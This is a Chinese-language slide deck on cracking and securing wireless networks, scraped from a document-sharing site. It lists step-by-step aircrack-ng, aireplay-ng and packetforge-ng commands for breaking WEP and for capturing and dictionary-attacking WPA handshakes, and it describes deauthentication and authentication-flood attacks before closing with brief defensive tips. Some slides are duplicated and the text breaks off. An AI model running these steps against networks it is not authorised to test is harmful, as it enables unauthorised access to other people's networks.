- 1、原创力文档(book118)网站文档一经付费(服务费),不意味着购买了该文档的版权,仅供个人/单位学习、研究之用,不得用于商业用途,未经授权,严禁复制、发行、汇编、翻译或者网络传播等,侵权必究。。
- 2、本站所有内容均由合作方或网友上传,本站不对文档的完整性、权威性及其观点立场正确性做任何保证或承诺!文档内容仅供研究参考,付费前请自行鉴别。如您付费,意味着您自己接受本站规则且自行承担风险,本站不退款、不进行额外附加服务;查看《如何避免下载的几个坑》。如果您已付费下载过本站文档,您可以点击 这里二次下载。
- 3、如文档侵犯商业秘密、侵犯著作权、侵犯人身权等,请点击“版权申诉”(推荐),也可以打举报电话:400-050-0827(电话支持时间:9:00-18:30)。
- 4、该文档为VIP文档,如果想要下载,成为VIP会员后,下载免费。
- 5、成为VIP后,下载本文档将扣除1次下载权益。下载后,不支持退款、换文档。如有疑问请联系我们。
- 6、成为VIP后,您将拥有八大权益,权益包括:VIP文档下载权益、阅读免打扰、文档格式转换、高级专利检索、专属身份标志、高级客服、多端互通、版权登记。
- 7、VIP文档为合作方或网友上传,每下载1次, 网站将根据用户上传文档的质量评分、类型等,对文档贡献者给予高额补贴、流量扶持。如果你也想贡献VIP文档。上传文档
查看更多
無线的破解与安全
无线的破解与安全
姜 辉
提纲
相关背景
WEP的破解(1)
WPA的破解
无线安全
相关背景
无线网卡的选择
芯片。Athetos ,Prism,Ralink (USB)
无线网卡的硬件/固件版本
无线网卡的功率及规格
基本知识
SSID(Service Set Identifier,服务集标识符)
一个唯一的标识符,最大长度32
WAP(wireless Application Protocol,无线应用协议)
AP((wireless Access Point)) 无线接入点
相关背景
几个比较好的无线破解系统(Linux)
BackTrack
WiFiSlax
WiFiWay
Linux系统下无线探测工具
Kismet(Bt4自带)
Wicrawl(扩展功能较好)
AirSnort(具有自动抓包并破解WEP的能力)
Bt4下使用iwlist或者
相关背景
几个比较出名linux系统
BackTrack
WiFiSlax
WiFiWay
Linux系统下无线探测工具
Kismet(Bt4自带)
Wicrawl(扩展功能较好)
AirSnort(具有自动抓包并破解WEP的能力)
Bt4下使用iwlist或者Internet-》Wicd Network Manager
相关背景
几个比较出名linux系统
BackTrack
WiFiSlax
WiFiWay
Linux系统下无线探测工具
Kismet(Bt4自带)
Wicrawl(扩展功能较好)
AirSnort(具有自动抓包并破解WEP的能力)
Bt4下使用iwlist或者Internet-》Wicd Network Manager
WEP破解技术(1)
Ifconfig –a wlan0 up
载入无线网卡的驱动程序
首先要在vmware中连接
探测无线AP的信息
airmon-ng start wlan0 监控频道
成功后会开启一个监控网卡,如 mon0
airodump–ng –w dump –channel 6 mon0
aireplay-ng -3 –b ap’s MAC –h client’s MAC –x 1024 mon0
aircrack-ng –x –f 2 dump-01.cap
WEP破解技术(2)
Ifconfig –a wlan0 up
载入无线网卡的驱动程序
首先要在vmware中连接
探测无线AP的信息
airmon-ng start wlan0 监控频道
成功后会开启一个监控网卡,如 mon0
airodump –ng –ivs –c 监控频道–w dump –channel 6 mon0
aireplay-ng -1 0 –e ap’s essid ap’s MAC –h client’s MAC (网卡) –x mon0
WEP破解技术(2)
aireplay-ng -4 –b AP’s MAC –h client’s MAC mon0
Chopchop 攻击
生产可用的密钥数据流文件
会生产一个cap和一个xor的文件
packetforge-ng –o –a AP’MAC –h client’s MAC -k 255.255.255.255 -1 255.255.255.255 –y
fragment xor file –w dump1
airepaly-ng -2 –r dump1 mon0
aircrack-ng dump*.ivs
WAP破解技术
airmon-ng start wlan0
没有正常的加载驱动
airodump-ng -w dump –channel 频道 mon0
Dump为数据包
aireplay-ng -o 攻击次数 AP’s MAC –h client’s
MAC mon0
WPA握手的验证
zcat /pentest/password/dictionaries/ wordlist.txt.Z password.txt
生产字典(bt4 自带)
aircrack-ng –w password.txt -z dump01.cap
破解
WEP破解流程
无线的安全
身份验证洪泛攻击
攻击原理
关联的客户端向AP发送大量伪造身份验证请求
当请求超出AP的承载能力时断开与客户的连接
攻击实现
使用看似合法的但是随机生成MAC伪造工作站
向AP发送大量的虚假请求
身份验证失败攻击
攻击原理
关联的客户端向AP伪造客户端无效验证帧
AP将受害客户端更新为状态1
攻击实现
关联客户端伪造某合法客户端向AP发送无效的验证帧
AP认为该验证请求无效
将受害者的状态更新为1
总结
尽量使用相对安全的防御措施
隐藏无线局域网的SSID号码
使用WPA加密
实施MAC地址过滤
进行8
您可能关注的文档
最近下载
- 【人教七年级上册数学情境课堂课件】 3.1.3 反比例关系 课件.pptx VIP
- Juniper路由器配置操作手册.docx VIP
- 设备动力部岗位说明书仪表工程师.pdf VIP
- 泳乐游泳馆商业计划书.pptx VIP
- 2025年全国大学生职业生涯规划大赛获奖作品鉴赏 .pdf VIP
- 放射科2025年工作总结及2025年工作计划.docx VIP
- 超星尔雅学习通《如何高效学习》章节测试答案.docx VIP
- 2023年中考语文小说阅读考点精讲精练 考点01 修辞手法(含详解).docx VIP
- 超星尔雅 学习通《如何高效学习》章节测试答案.pdf VIP
- 《有线通信系统》全套教学课件.pptx
原创力文档


文档评论(0)